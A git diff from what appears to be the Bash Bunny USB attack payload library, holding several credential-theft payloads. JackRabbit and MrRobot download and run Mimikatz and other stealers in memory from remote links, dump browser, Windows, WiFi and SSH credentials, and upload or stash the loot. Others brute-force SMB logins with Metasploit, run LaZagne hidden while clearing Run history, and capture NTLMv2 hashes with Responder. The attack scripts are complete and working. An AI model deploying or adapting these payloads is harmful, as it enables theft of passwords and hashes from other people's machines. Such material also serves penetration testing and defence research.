Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2mLu0R3\'\)\; Get-FoxDump \| Out-File \$LOOTDIR2\\FireFox.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING exit
|
||||
Q ENTER
|
||||
|
||||
# UAC Bypass
|
||||
Q GUI r
|
||||
Q STRING powershell -c "Start-Process powershell -verb runas"
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
Q LEFTARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
Q STRING \$Bunny \= \(gwmi win32_volume -f \'label\=\'\'BashBunny\'\'\' \| Select-Object -ExpandProperty DriveLetter\)
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$LOOTDIR2 \= \"\$\(\$Bunny\)\\loot\\JackRabbit\\\$\(\$env:computername\)-\$\(\$env:username\)\"
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' Windows creds
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nP5aQv\'\)\; Invoke-Mimidogz -DumpCred \| Out-File -Append \$LOOTDIR2\\MimiKatz.txt
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
|
||||
# Jackin' Wifi creds
|
||||
Q STRING \(netsh wlan show profiles\) \| Select-String \"\\:\(.+\)\$\" \| \%\{\$name\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \|
|
||||
Q STRING \%\{\(netsh wlan show profile name\=\""\$name\"" key\=clear\)\} \| Select-String \""Key Content\\W+\\:(.+)\$\"" \|
|
||||
Q STRING \%\{\$pass\=\$_.Matches \| \% \{\$_.Groups\[1\].Value.Trim\(\)\}\; \$_\} \| \%\{\[PSCustomObject\]@\{ "PROFILE_NAME"\=\$name\;PASSWORD\=\$pass \}\} \|
|
||||
Q STRING Format-Table -AutoSize \| Out-File \$LOOTDIR2\\WiFi.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' SSH Creds
|
||||
# change to "Invoke-SessionGopher -Thorough" if you want to search for PuTTY private key (.ppk), Remote Desktop (.rdp), and RSA token (.sdtid) files, to extract private key and session information.
|
||||
Q STRING IEX \(New-Object Net.WebClient\).DownloadString\(\'http:\/\/bit.ly\/2nrfTPI\'\)\; Invoke-SessionGopher \| ft -AutoSize \| Out-File \$LOOTDIR2\\SSH.txt
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Jackin' dem install configs
|
||||
Q STRING \$F \= @\(\)\;\$F \+\= \"C:\\sysprep.inf\"\;\$F \+\= \"C:\\sysprep\\sysprep.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattend\\Unattended.xml\"\;\$F \+\= \"C:\\WINDOWS\\panther\\Unattended.xml\"\;
|
||||
Q STRING \$i \= 0\; foreach\(\$file in \$F\) \{if \(Test-Path \$file\)\{cp \$file \$LOOTDIR2\;\$i\+\+\}\}
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Output DONE to root of USB file to let bashbunny we're all good in the hood
|
||||
Q DELAY 100
|
||||
Q STRING Out-File -FilePath \$BUNNY\\loot\\DONE
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
|
||||
# Eject the USB Safely
|
||||
Q STRING \$Eject \= New-Object -comObject Shell.Application
|
||||
Q ENTER
|
||||
Q DELAY 100
|
||||
Q STRING \$Eject.NameSpace\(17\).ParseName\(\$Bunny\).InvokeVerb\(\"Eject\"\)
|
||||
Q ENTER
|
||||
Q DELAY 1000
|
||||
|
||||
# GTFO
|
||||
Q STRING EXIT
|
||||
Q ENTER
|
||||
|
||||
#Sync Drive
|
||||
sync
|
||||
|
||||
|
||||
FILE="/root/udisk/loot/DONE"
|
||||
while [ ! -e $FILE ]; do sleep 1; done;
|
||||
sleep 1;
|
||||
if [ -e $FILE ]; then rm -f $FILE; LED G 200
|
||||
else LED R;
|
||||
for (( ; ; ))
|
||||
do
|
||||
LED R;
|
||||
sleep 1;
|
||||
LED B;
|
||||
sleep 1;
|
||||
done
|
||||
fi
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
@@ -1,25 +0,0 @@
|
||||
# JackRabbit
|
||||
|
||||
* Author: illwill
|
||||
* Version: Version 0.1
|
||||
* Target: Windows
|
||||
|
||||
## Description
|
||||
|
||||
Jacks the Browsers/Windows/WiFi/SSH passwords and install config files from Windows boxes by downloading a
|
||||
Powershell script into memory then stashes them in /root/udisk/loot/JackRabbit/%ComputerName%
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Purple (blinking) | Jackin dat loot |
|
||||
| Green (blinking) | Jacked dat loot |
|
||||
| RED BLUE(blinking) | PoPo caught yo ass |
|
||||
|
||||
## Discussion
|
||||
|
||||
131
payloads/library/credentials/Jackalope/payload.txt
Normal file
131
payloads/library/credentials/Jackalope/payload.txt
Normal file
@@ -0,0 +1,131 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Jackalope
|
||||
# Author: catatonic
|
||||
# Version: 1.1.0
|
||||
# Target: Windows
|
||||
# Attack Modes: HID, RNDIS_ETHERNET
|
||||
# Description:
|
||||
# Uses Metasploit to launch an SMB password stealing attack.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Cyan Blink: Clearing Password
|
||||
# Yellow Blink: Attack Phase 1
|
||||
# Yellow Double Blink: Attack Phase 2
|
||||
# Red Blink: Attack Failure
|
||||
# Red Fast Blink: Recon Failure
|
||||
# Green: Attack Finished
|
||||
|
||||
# Check readiness & prepare environment
|
||||
LED SETUP
|
||||
|
||||
# REQUIRE-TOOL metasploit-framework
|
||||
ATTACKMODE HID RNDIS_ETHERNET
|
||||
|
||||
# Ensure loot is available for recording results.
|
||||
mount /dev/nandf /root/udisk/
|
||||
|
||||
ORIGINAL_SWITCH=$SWITCH_POSITION
|
||||
PAYLOAD_DIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
LOOTBASE=/root/udisk/loot/Jackalope/
|
||||
|
||||
# SETUP
|
||||
GET TARGET_IP
|
||||
GET TARGET_HOSTNAME
|
||||
|
||||
COUNT=$(ls -lad $LOOTBASE/$TARGET_HOSTNAME* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
LOOTDIR=$LOOTBASE/$TARGET_HOSTNAME-$COUNT
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
source /etc/profile.d/rvm.sh
|
||||
rvm --default use 2.6.2 >> $LOOTDIR/log.txt
|
||||
MSF_DIR=/tools/metasploit-framework
|
||||
|
||||
# Save environment informaiton:
|
||||
echo "PAYLOAD_DIR: $PAYLOAD_DIR" >> $LOOTDIR/log.txt
|
||||
echo "MSF_DIR: $MSF_DIR" >> $LOOTDIR/log.txt
|
||||
echo "LOOTDIR: $LOOTDIR" >> $LOOTDIR/log.txt
|
||||
echo "TARGET_IP: $TARGET_IP" >> $LOOTDIR/log.txt
|
||||
echo "TARGET_HOSTNAME: $TARGET_HOSTNAME" >> $LOOTDIR/log.txt
|
||||
|
||||
SYNC ()
|
||||
{
|
||||
sync; sleep 1; sync
|
||||
}
|
||||
CLEAR_PW()
|
||||
{
|
||||
LED SPECIAL
|
||||
rm $PAYLOAD_DIR/quack_pass.txt
|
||||
SYNC
|
||||
WAIT
|
||||
}
|
||||
ENTER_PW()
|
||||
{
|
||||
sleep 1
|
||||
QUACK $ORIGINAL_SWITCH/quack_pass.txt
|
||||
QUACK ENTER
|
||||
}
|
||||
RECON()
|
||||
{
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
# Stage 1: Recon
|
||||
LED STAGE1
|
||||
echo "Executing nmap..." >> $LOOTDIR/log.txt
|
||||
nmap -p 445 -Pn $TARGET_IP > $LOOTDIR/nmap_results.txt
|
||||
if ! grep --quiet "445.*open" $LOOTDIR/nmap_results.txt;
|
||||
then
|
||||
LED FAIL2
|
||||
SYNC
|
||||
exit
|
||||
fi
|
||||
}
|
||||
EXPLOIT()
|
||||
{
|
||||
# Stage 2: Exploit
|
||||
LED STAGE2
|
||||
export HOME=/root
|
||||
cd $MSF_DIR
|
||||
./msfconsole -q -x "use auxiliary/scanner/smb/smb_login; set RHOSTS $TARGET_IP; set USER_FILE $PAYLOAD_DIR/userlist.txt; set PASS_FILE $PAYLOAD_DIR/wordlist.txt; run; exit" > $LOOTDIR/msfconsole.txt
|
||||
|
||||
if ! grep --quiet "^\[+\]" $LOOTDIR/msfconsole.txt;
|
||||
then
|
||||
LED FAIL
|
||||
echo "Payload failed, no logins found..." >> $LOOTDIR/log.txt
|
||||
SYNC
|
||||
exit
|
||||
fi
|
||||
|
||||
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 1 | cut -d "'" -f 2 > $LOOTDIR/user.txt
|
||||
grep "^\[+\]" $LOOTDIR/msfconsole.txt | grep -o \'.*\' | cut -d ':' -f 2 | cut -d "'" -f 1 > $LOOTDIR/password.txt
|
||||
|
||||
# Focus needs to be set on the password field manually.
|
||||
echo -n "STRING " > $PAYLOAD_DIR/quack_pass.txt
|
||||
cat $LOOTDIR/password.txt >> $PAYLOAD_DIR/quack_pass.txt
|
||||
|
||||
SYNC
|
||||
}
|
||||
|
||||
# High level view.
|
||||
while true
|
||||
do
|
||||
if [ -f $PAYLOAD_DIR/quack_pass.txt ];
|
||||
then
|
||||
LED FINISH
|
||||
else
|
||||
RECON
|
||||
EXPLOIT
|
||||
continue
|
||||
fi
|
||||
|
||||
WAIT
|
||||
|
||||
# User's choice, clear old password or enter password.
|
||||
if [ "$SWITCH_POSITION" == "switch3" ];
|
||||
then
|
||||
CLEAR_PW
|
||||
else
|
||||
ENTER_PW
|
||||
fi
|
||||
done
|
||||
48
payloads/library/credentials/Jackalope/readme.md
Normal file
48
payloads/library/credentials/Jackalope/readme.md
Normal file
@@ -0,0 +1,48 @@
|
||||
# Jackalope
|
||||
```
|
||||
`\ # # /'
|
||||
| \ # # /;|
|
||||
\ :\# #|; /
|
||||
\./#_#\./
|
||||
/ \
|
||||
: O O "
|
||||
| \ / |
|
||||
\ v /
|
||||
\_x_/
|
||||
|
||||
Jackalope
|
||||
by: catatonic
|
||||
```
|
||||
* Author: catatonic
|
||||
* Target: Windows (for now)
|
||||
|
||||
## Description
|
||||
|
||||
Uses ethernet to attempt dictionary attacks against passwords. When the password is discovered it is stored in a file for future use. The password may be used to unlock the machine by:
|
||||
|
||||
1. Manually select user & place focus on the password field at the login screen
|
||||
2. Toggle the switch position from switch1 to switch2 (or vice versa) & the bunny will auto-type the stored password.
|
||||
|
||||
To clear a stored password move the switch to switch3 (aka arming mode) after the payload runs and displays GREEN. The status light will change to SPECIAL (cyan) indicating the password has been removed. Positioning the switch to switch1 or switch2 will re-initiate the attack.
|
||||
|
||||
## Configuration
|
||||
No initial configuration is required for bunny firmware v1.6+.
|
||||
|
||||
### Per attack configuration
|
||||
1. userlist.txt contains usernames to use in attack.
|
||||
2. wordlist.txt contains passwords to use in attack.
|
||||
|
||||
Note: A fantastic collection of password wordlists are available: [SecLists](https://github.com/danielmiessler/SecLists)
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ----------------------- | ---------------------------------------------- |
|
||||
| FAIL | Attack failed, username/password not found |
|
||||
| FAIL2 | Attack failed, network inaccessible |
|
||||
| STAGE 1 | Stage 1: checking for SMB port with nmap |
|
||||
| STAGE 2 | Stage 2: Brute forcing |
|
||||
| Green (solid) | Attack complete, check loot or flip switch to switch1 or switch2 to enter password. Flip switch to switch3 (arming) to clear password. |
|
||||
| SPECIAL | Clearing/cleared password, flip switch to switch 1 or switch 2 to initiate attack. |
|
||||
| Purple (solid) | Preparing to attack |
|
||||
|
||||
1
payloads/library/credentials/Jackalope/userlist.txt
Normal file
1
payloads/library/credentials/Jackalope/userlist.txt
Normal file
@@ -0,0 +1 @@
|
||||
Administrator
|
||||
100
payloads/library/credentials/Jackalope/wordlist.txt
Normal file
100
payloads/library/credentials/Jackalope/wordlist.txt
Normal file
@@ -0,0 +1,100 @@
|
||||
123456
|
||||
password
|
||||
12345678
|
||||
qwerty
|
||||
123456789
|
||||
12345
|
||||
1234
|
||||
111111
|
||||
1234567
|
||||
dragon
|
||||
123123
|
||||
baseball
|
||||
abc123
|
||||
football
|
||||
monkey
|
||||
letmein
|
||||
696969
|
||||
shadow
|
||||
master
|
||||
666666
|
||||
qwertyuiop
|
||||
123321
|
||||
mustang
|
||||
1234567890
|
||||
michael
|
||||
654321
|
||||
pussy
|
||||
superman
|
||||
1qaz2wsx
|
||||
7777777
|
||||
fuckyou
|
||||
121212
|
||||
000000
|
||||
qazwsx
|
||||
123qwe
|
||||
killer
|
||||
trustno1
|
||||
jordan
|
||||
jennifer
|
||||
zxcvbnm
|
||||
asdfgh
|
||||
hunter
|
||||
buster
|
||||
soccer
|
||||
harley
|
||||
batman
|
||||
andrew
|
||||
tigger
|
||||
sunshine
|
||||
iloveyou
|
||||
fuckme
|
||||
2000
|
||||
charlie
|
||||
robert
|
||||
thomas
|
||||
hockey
|
||||
ranger
|
||||
daniel
|
||||
starwars
|
||||
klaster
|
||||
112233
|
||||
george
|
||||
asshole
|
||||
computer
|
||||
michelle
|
||||
jessica
|
||||
pepper
|
||||
1111
|
||||
zxcvbn
|
||||
555555
|
||||
11111111
|
||||
131313
|
||||
freedom
|
||||
777777
|
||||
pass
|
||||
fuck
|
||||
maggie
|
||||
159753
|
||||
aaaaaa
|
||||
ginger
|
||||
princess
|
||||
joshua
|
||||
cheese
|
||||
amanda
|
||||
summer
|
||||
love
|
||||
ashley
|
||||
6969
|
||||
nicole
|
||||
chelsea
|
||||
biteme
|
||||
matthew
|
||||
access
|
||||
yankees
|
||||
987654321
|
||||
dallas
|
||||
austin
|
||||
thunder
|
||||
taylor
|
||||
matrix
|
||||
File diff suppressed because one or more lines are too long
@@ -1,4 +0,0 @@
|
||||
IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');$o = Invoke-Mimidogz -DumpCred
|
||||
(New-Object Net.WebClient).UploadString('http://172.16.64.1/'+$env:computername, $o)
|
||||
(New-Object Net.WebClient).UploadString('http://172.16.64.1/EOF', 'EOF');
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
||||
@@ -1,70 +0,0 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: MrRobot Mimikatz Attack
|
||||
# Author: illwill, El3ct71k
|
||||
# Version: 0.2
|
||||
#
|
||||
# Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
|
||||
# with Mimikatz then stashes them in /root/udisk/loot/MrRobot
|
||||
#
|
||||
# Purple......................Setup
|
||||
# Yellow single blink.........Running Powershell / Waiting for WebServer to start
|
||||
# Yellow double blink.........Waiting for server connection and uploading results
|
||||
# Cyan inverted single blink..Starts ethenet attack
|
||||
# Cyan inverted double blink..Starts server to gets results
|
||||
# Green..............Got Creds and copied to loot folder
|
||||
# Red................No Creds
|
||||
LED SETUP
|
||||
# Creating Loot Folders
|
||||
LOOTDIR=/root/udisk/loot/MrRobot
|
||||
mkdir -p $LOOTDIR
|
||||
SWITCHDIR=/root/udisk/payloads/$SWITCH_POSITION
|
||||
mkdir -p $SWITCHDIR/loot
|
||||
|
||||
# HID Attack Starts
|
||||
ATTACKMODE HID
|
||||
# UAC Bypass
|
||||
LED STAGE1
|
||||
RUN WIN powershell -c "Start-Process cmd -verb runas"
|
||||
Q DELAY 250
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
Q LEFTARROW
|
||||
Q DELAY 500
|
||||
Q ENTER
|
||||
Q DELAY 1500
|
||||
|
||||
LED STAGE2
|
||||
#Powershell Payload: first wait for connection to bunny webserver, then pull scripts and upload results
|
||||
Q STRING "powershell -W Hidden \"while (\$true) {If (Test-Connection 172.16.64.1 -count 1) {IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/p.ps1');exit}}\""
|
||||
Q DELAY 300
|
||||
Q ENTER
|
||||
# Ethernet Attack Starts
|
||||
ATTACKMODE RNDIS_ETHERNET
|
||||
LED SPECIAL1
|
||||
# mount -o sync /dev/nandf /root/udisk
|
||||
|
||||
iptables -A OUTPUT -p udp --dport 53 -j DROP
|
||||
python $SWITCHDIR/server.py
|
||||
|
||||
|
||||
#Wait for EOF in loot folder
|
||||
LED SPECIAL2
|
||||
while [ ! -e "$SWITCHDIR/loot/EOF" ]; do sleep 1; done;
|
||||
sleep 1
|
||||
|
||||
# check for empty lootddd directory, then check results and move them to loot
|
||||
if [ "$(ls -A $SWITCHDIR/loot/)" ]; then
|
||||
if grep -q "ERROR kuhl_m_sekurlsa_acquireLSA" $SWITCHDIR/loot/*.txt; then
|
||||
LED FAIL
|
||||
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
|
||||
rm -rf $SWITCHDIR/loot/
|
||||
else
|
||||
mv -v $SWITCHDIR/loot/*.txt $LOOTDIR
|
||||
rm -rf $SWITCHDIR/loot/
|
||||
LED FINISH
|
||||
fi
|
||||
else
|
||||
rm -rf $SWITCHDIR/loot/
|
||||
LED FAIL
|
||||
fi
|
||||
@@ -1,28 +0,0 @@
|
||||
# MrRobot
|
||||

|
||||
* Author: illwill & tuxxy
|
||||
* Version: Version 0.2
|
||||
* Target: Windows
|
||||
|
||||
## Description
|
||||
|
||||
Dumps the usernames & plaintext passwords from Windows boxes using Powershell in memory
|
||||
with Mimikatz then stashes them in /root/udisk/loot/MrRobot
|
||||
|
||||
## Configuration
|
||||
|
||||
None needed.
|
||||
|
||||
## STATUS
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Blue (blinking) | Running Powershell / Waiting for WebServer |
|
||||
| White (blinking) | WebServer started and Uploading Results |
|
||||
| Purple (blinking) | DChecking for Results |
|
||||
| Green | Got Creds and copied to loot folder |
|
||||
| Amber (blinking) | MimiKatz failed (Not Admin?) |
|
||||
| Red (blinking) | No Creds / Mimikatz failed |
|
||||
|
||||
## Discussion
|
||||
[Hak5 Forum Thread](https://forums.hak5.org/index.php?/topic/40524-payload-mrrobot/ "Hak5 Forum Thread")
|
||||
@@ -1,38 +0,0 @@
|
||||
@echo off
|
||||
@echo Installing Windows Update
|
||||
|
||||
REM Delete registry keys storing Run dialog history
|
||||
REG DELETE HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU /f
|
||||
|
||||
REM Creates directory compromised of computer name, date and time
|
||||
REM %~d0 = path to this batch file. %COMPUTERNAME%, %date% and %time% pretty obvious
|
||||
|
||||
REM This executes LaZagne in the current directory and outputs the password file to Loot
|
||||
REM Time and Date is also added
|
||||
setlocal
|
||||
cd /d %~dp0
|
||||
%~dp0\laZagne.exe all > %~dp0\..\..\loot\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%_passwords.txt
|
||||
|
||||
REM These lines if you just want Passwords and no files.
|
||||
set dst=%~dp0\..\..\loot\USB_Exfiltration\%COMPUTERNAME%_%date:~-4,4%%date:~-10,2%%date:~7,2%_%time:~-11,2%%time:~-8,2%%time:~-5,2%
|
||||
mkdir %dst% >>nul
|
||||
|
||||
if Exist %USERPROFILE%\Documents (
|
||||
REM /C Continues copying even if errors occur.
|
||||
REM /Q Does not display file names while copying.
|
||||
REM /G Allows the copying of encrypted files to destination that does not support encryption.
|
||||
REM /Y Suppresses prompting to confirm you want to overwrite an existing destination file.
|
||||
REM /E Copies directories and subdirectories, including empty ones.
|
||||
|
||||
REM xcopy /C /Q /G /Y /E %USERPROFILE%\Documents\*.pdf %dst% >>nul
|
||||
|
||||
REM Same as above but does not create empty directories
|
||||
REM xcopy /C /Q /G /Y /S %USERPROFILE%\Documents\*.flac %dst% >>nul
|
||||
|
||||
)
|
||||
|
||||
REM Blink CAPSLOCK key
|
||||
start /b /wait powershell.exe -nologo -WindowStyle Hidden -sta -command "$wsh = New-Object -ComObject WScript.Shell;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}');sleep -m 250;$wsh.SendKeys('{CAPSLOCK}')"
|
||||
|
||||
@cls
|
||||
@exit
|
||||
5
payloads/library/credentials/PasswordGrabber/payload.ps1
Normal file
5
payloads/library/credentials/PasswordGrabber/payload.ps1
Normal file
@@ -0,0 +1,5 @@
|
||||
$dest = ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'loot\PasswordGrabber')
|
||||
$filter = 'password_'+ $env:COMPUTERNAME
|
||||
$filecount = ((Get-ChildItem -filter ($filter + "*") -path $dest | Measure-Object | Select -ExpandProperty Count) + 1)
|
||||
Start-Process -WindowStyle Hidden -FilePath ((Get-WmiObject win32_volume -f 'label=''BashBunny''').Name+'tools\laZagne.exe') -ArgumentList 'all -vv' -RedirectStandardOutput ($dest +'\' + $filter +'_' + $filecount +'.txt')
|
||||
Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue
|
||||
@@ -1,18 +1,38 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: USB Exfiltrator
|
||||
# Author: Hak5Darren
|
||||
# Title: Password Grabber
|
||||
# Description: Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||
# This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||
# This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
|
||||
# Author: jdebetaz
|
||||
# Props: Hak5Darren, AlessandroZ, TeCHemically, dragmus13, RazerBlade
|
||||
# Version: 1.1
|
||||
# Target: Windows XP SP3+
|
||||
# Props: Diggster, IMcPwn
|
||||
# Category: Exfiltration
|
||||
#
|
||||
# Executes d.cmd from the selected switch folder of the Bash Bunny USB Disk partition,
|
||||
# which in turn executes e.cmd invisibly using i.vbs
|
||||
# which in turn executes and if stated, copies documents to the loot folder on the Bash Bunny.
|
||||
# Target: Windows
|
||||
# Attack Modes: HID, STORAGE
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blinking: Attacking
|
||||
# Green: Attack Finished
|
||||
|
||||
LED ATTACK
|
||||
|
||||
# Options
|
||||
LOOTDIR=/root/udisk/loot/PasswordGrabber
|
||||
|
||||
######## INITIALIZATION ########
|
||||
LED SETUP
|
||||
GET SWITCH_POSITION
|
||||
ATTACKMODE HID STORAGE
|
||||
RUN WIN powershell ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\d.cmd')"
|
||||
|
||||
######## MAKE LOOT DIRECTORY ########
|
||||
# Setup named logs in loot directory
|
||||
mkdir -p $LOOTDIR
|
||||
|
||||
######## ATTACK ########
|
||||
LED ATTACK
|
||||
RUN WIN "powerShell -windowstyle hidden -ExecutionPolicy Bypass .((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\payload.ps1')"
|
||||
# Wait until passwords are grabbed.
|
||||
sleep 10
|
||||
|
||||
######## FINISH ########
|
||||
LED FINISH
|
||||
|
||||
@@ -1,32 +1,35 @@
|
||||
# PasswordGrabber
|
||||
|
||||
* Author: RazerBlade
|
||||
* Creds: Hak5Darren, AlessandroZ
|
||||
* Version: Version 1.1
|
||||
* Firmware support: 1.1
|
||||
* Target: Windows
|
||||
* Author: [jdebetaz](https://github.com/jdebetaz)
|
||||
* Creds: [Hak5Darren](https://github.com/hak5darren), [AlessandroZ](https://github.com/AlessandroZ), TeCHemically, dragmus13, RazerBlade
|
||||
* Version: 1.3
|
||||
* Frimware support: 1.1 and higher
|
||||
* Target version: Windows 7 and higher
|
||||
|
||||
## Description
|
||||
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more... This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack. This payload makes use of AleZssandroZ awsome LaZagne password recovery tool.
|
||||
|
||||
Grabs password from all sort of things: chrome, internet explorer, firefox, filezilla and more...
|
||||
This payload is quick and silent and takes about 3 seconds after the Bash Bunny have started to quack.
|
||||
Full read here: https://github.com/AlessandroZ/LaZagne
|
||||
|
||||
Full read here: [LaZagne Repository](https://github.com/AlessandroZ/LaZagne)
|
||||
|
||||
## Configuration
|
||||
By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||
I have commented out the copy command but if you want copy command and password just remove the remove infront of xcopy
|
||||
1. You need to download the lastest file from [LaZagne release page](https://github.com/AlessandroZ/LaZagne/releases).
|
||||
2. Unzip the exe file and place it in the tools folder. The payload folder should contain all the files that are in this payload and the LaZagne.exe
|
||||
3. Plug your BashBunny and Enjoy
|
||||
|
||||
Hak5 is not responsible for the execution of 3rd party binaries. Therefore I am not allowed to include it in github. You can easily download the binary from here or compile yourself https://github.com/AlessandroZ/LaZagne
|
||||
When compiled or downloaded, just drop it of to the PasswordGrabbers folder and you are good to go!
|
||||
Tips: You may need to disable your antivirus when downloading and unziping the file as I have noticed that some antivirus like AVAST removes the file.
|
||||
|
||||
## STATUS
|
||||
## Info
|
||||
jdebetaz: I remake this playload with the Payload Best Practice / Style Guide
|
||||
|
||||
| LED | Status |
|
||||
| ------------------ | -------------------------------------------- |
|
||||
| Red | Attack Setup |
|
||||
| Green | Attack Complete |
|
||||
RazerBlade: By default the payload is identical to the Payload [usb_exfiltrator] but adds some commands to execute LaZagne and save the passwords to the loot folder.
|
||||
|
||||
## Discussion
|
||||
[Hak5 Forum Thread] https://forums.hak5.org/index.php?/topic/40437-payload-passwordgrabber/
|
||||
## Disclaimer
|
||||
__Hak5 and playload's contributors are not responsible for the execution of 3rd party binaries.__
|
||||
|
||||
## Led status
|
||||
|
||||
| LED | Status |
|
||||
|-----------------------------------------------|--------|
|
||||
| Magenta solid | Setup |
|
||||
| Yellow single blink | Attack |
|
||||
| Green 1000ms VERYFAST blink followed by SOLID | Finish |
|
||||
|
||||
64
payloads/library/credentials/Quickdraw/payload.txt
Normal file
64
payloads/library/credentials/Quickdraw/payload.txt
Normal file
@@ -0,0 +1,64 @@
|
||||
#!/bin/bash
|
||||
#
|
||||
# Title: Quickdraw
|
||||
# Author: golem445
|
||||
# Version: 1.0
|
||||
# Attack Modes: HID, RNDIS_ETHERNET
|
||||
# Dependencies: Responder
|
||||
# Runtime: ~8 seconds
|
||||
# Description:
|
||||
# Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
# runs Responder, then uses HID to generate an NTLMv2 hash
|
||||
# response from the target computer.
|
||||
#
|
||||
# LEDS:
|
||||
# Magenta: Setup
|
||||
# Yellow Blink: Attacking
|
||||
# Green: Attack Finished
|
||||
|
||||
# Prereq check
|
||||
REQUIRETOOL responder
|
||||
|
||||
# Begin attack setup
|
||||
LED SETUP
|
||||
ATTACKMODE RNDIS_ETHERNET HID
|
||||
GET TARGET_HOSTNAME
|
||||
LOOTDIR=/root/udisk/loot/quickdraw
|
||||
|
||||
# Prep loot logging
|
||||
mkdir -p $LOOTDIR
|
||||
HOST=${TARGET_HOSTNAME}
|
||||
COUNT=$(ls -lad $LOOTDIR/$HOST* | wc -l)
|
||||
COUNT=$((COUNT+1))
|
||||
mkdir -p $LOOTDIR/$HOST-$COUNT
|
||||
cd /tools/responder/
|
||||
rm logs/*
|
||||
|
||||
# Begin Responder
|
||||
LED ATTACK
|
||||
python Responder.py -I usb0 -wfvr &
|
||||
|
||||
## Start HID Attack
|
||||
sleep 1
|
||||
RUN WIN cmd
|
||||
Q DELAY 250
|
||||
Q STRING "powershell \\\\172.16.64.1\\s"
|
||||
Q ENTER
|
||||
Q STRING "exit"
|
||||
Q ENTER
|
||||
|
||||
# Wait for NTLMv2 capture to complete
|
||||
LED STAGE2
|
||||
until [ -f logs/*NTLM* ]
|
||||
do
|
||||
sleep 1
|
||||
done
|
||||
|
||||
# copy logs to loot directory
|
||||
cp logs/* $LOOTDIR/$HOST-$COUNT
|
||||
|
||||
# Sync the file system
|
||||
sync
|
||||
|
||||
## Finished
|
||||
LED FINISH
|
||||
26
payloads/library/credentials/Quickdraw/readme.md
Normal file
26
payloads/library/credentials/Quickdraw/readme.md
Normal file
@@ -0,0 +1,26 @@
|
||||
# Quickdraw
|
||||
* Author: golem445
|
||||
* Version: 1.0
|
||||
* Target: Windows Domains
|
||||
|
||||
## Description
|
||||
|
||||
Sets up Ethernet and HID keyboard interfaces simultaneously,
|
||||
runs Responder, then uses HID to generate an NTLMv2 hash
|
||||
response from the target computer.
|
||||
|
||||
Note: This module will bypass network restrictions on USB
|
||||
disk drives as only a network card and keyboard are emulated.
|
||||
|
||||
## Requirements
|
||||
|
||||
Responder should be installed
|
||||
|
||||
## STATUS
|
||||
|
||||
| Status | Description |
|
||||
| ------------------- | ---------------------------------------- |
|
||||
| Flashing Red | Responder not found |
|
||||
| Solid Violet | Setup for attack |
|
||||
| Flashing Amber | Attack in progress |
|
||||
| Solid Green | Attack complete |
|
||||
803
payloads/library/credentials/Roaster/invoke-kerberoast.ps1
Normal file
803
payloads/library/credentials/Roaster/invoke-kerberoast.ps1
Normal file
@@ -0,0 +1,803 @@
|
||||
<#
|
||||
|
||||
Invoke-Kerberoast.ps1
|
||||
Author: Will Schroeder (@harmj0y), @machosec
|
||||
License: BSD 3-Clause
|
||||
